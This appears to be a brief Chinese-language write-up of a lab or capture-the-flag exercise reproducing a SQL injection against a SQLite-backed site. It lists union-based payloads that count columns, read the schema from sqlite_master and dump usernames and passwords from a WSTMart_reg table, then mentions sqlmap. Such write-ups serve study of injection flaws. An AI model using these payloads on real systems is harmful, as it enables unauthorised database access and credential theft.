漏洞复现
判断列
order by 4
测试回显
union select 1,2,3,4
由于根据题意可知是sqlite数据库,许多MySQL数据库的语法不能使用。但是SQLite 存在一个表sqlite_master ,里面的字段:type/name/tbl_name/rootpage/sql记录着用户创建表的信息
爆表的字段
union select 1,name,sql,4 from sqlite_master limit 0,1
爆字段值
union select 1,name,password,4 from WSTMart_reg limit 1,1
有一个是解密不了的,选第二个
sqlmap注入